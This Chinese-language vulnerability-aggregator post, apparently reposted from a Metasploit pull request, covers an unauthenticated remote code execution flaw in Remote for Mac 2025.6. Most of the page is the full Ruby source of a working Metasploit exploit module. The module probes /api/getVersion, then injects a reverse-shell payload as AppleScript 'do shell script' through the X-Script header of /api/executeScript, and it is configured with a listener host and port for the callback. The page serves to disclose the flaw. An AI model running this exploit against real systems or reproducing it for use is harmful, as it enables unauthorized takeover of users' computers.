Remote for Mac 20256 - Unauthenticated RCE

漏洞信息

漏洞名称: Remote for Mac 2025.6 - Unauthenticated RCE

漏洞编号:

  • CVE: Pending

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 该漏洞存在于Remote for Mac 2025.6版本中,是一款专为macOS设计的远程控制软件,广泛应用于个人和企业环境中,以实现远程桌面控制和文件传输等功能。漏洞的具体类型为未授权远程代码执行(RCE),其技术根源在于软件的/api/executeScript端点未正确实施身份验证机制,导致攻击者无需任何认证即可发送恶意AppleScript命令。由于AppleScript支持通过do shell script执行shell命令,攻击者可利用此漏洞在目标系统上执行任意命令,从而完全控制受影响的系统。此漏洞的利用无需用户交互,且可自动化执行,因此对使用该软件的用户构成了严重的安全威胁。攻击者可以利用此漏洞进行数据泄露、服务中断或进一步的内网渗透等恶意活动。

产品厂商: Cherpake

产品名称: Remote for Mac

影响版本: 2025.6

来源: https://github.com/rapid7/metasploit-framework/blob/82c27249de137e90a5c4715564aae8940f55d81f/modules%2Fexploits%2Fosx%2Fhttp%2Fremote_for_mac_rce.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126

##
# Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE MSF Module
# Date: May 2025
# Exploit Author: Chokri Hammedi (@chokri0x00)
# Vendor Homepage: https://www.cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Exploit Source: https://packetstormsecurity.com/files/195347/
# Version: Remote for Mac 2025.6
# Tested on: macOS Mojave, macOS Ventura
##

require 'json'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 - Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in
          Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
          disabled on the target system, it allows attackers to execute arbitrary AppleScript
          commands, which can include shell commands via `do shell script`.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Chokri Hammedi (@blue0x1)'],
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/195347/']
        ],
        'DisclosureDate' => '2025-05-27',
        'CVE' => 'Pending',
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [['Auto', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 49229,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [ 'CRASH_SAFE' ],
          'Reliability' => [ 'REPEATABLE_SESSION' ],
          'SideEffects' => [ 'ARTIFACTS_ON_DISK' ]
        }
      )
    )

    register_options([
      Opt::RHOST(),
      Opt::RPORT(49229),
      OptBool.new('SSL', [true, 'Enable SSL/TLS', true]),
      OptString.new('LHOST', [true, 'Local host to receive reverse shell']),
      OptInt.new('LPORT', [true, 'Local port to receive reverse shell', 4444]),
      OptBool.new('FORCE', [false, 'Force exploitation even if checks fail', false])
    ])
  end

  def check
    return CheckCode::Unknown('Skipping version/auth checks (--force)') if datastore['FORCE']

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
      'method' => 'GET',
      'ssl' => datastore['SSL']
    )

    return CheckCode::Unknown('No response from target') unless res && res.code == 200

    begin
      info = JSON.parse(res.body)
    rescue JSON::ParserError
      return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
    end

    if info['requires.auth'] == true
      return CheckCode::Safe('Target requires authentication on /api/executeScript')
    end

    if info['version'] != '2025.6'
      return CheckCode::Safe("Target version is #{info['version']}, not vulnerable")
    end

    CheckCode::Appears
  end

  def exploit
    unless datastore['FORCE'] || check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target does not appear vulnerable')
    end

    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
    cmd = payload.encoded
    escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
    applescript = %(do shell script "#{escaped}")

    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
      'method' => 'GET',
      'ssl' => datastore['SSL'],
      'headers' => {
        'X-ClientToken' => '1337',
        'X-HostName' => 'iFruit',
        'X-HostFullModel' => 'iFruit19,2',
        'X-Script' => applescript,
        'X-ScriptName' => 'exploit',
        'X-ScriptDelay' => '0'
      }
    )

    if res && res.code == 200
      print_good('Payload delivered successfully. Awaiting session...')
    else
      fail_with(Failure::Unknown, "Unexpected HTTP response: #{res ? res.code : 'no response'}")
    end
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #命令执行
Remote for Mac 20256 - Unauthenticated RCE
http://example.com/2025/07/28/github_2324156393/
作者
lianccc
发布于
2025年7月28日
许可协议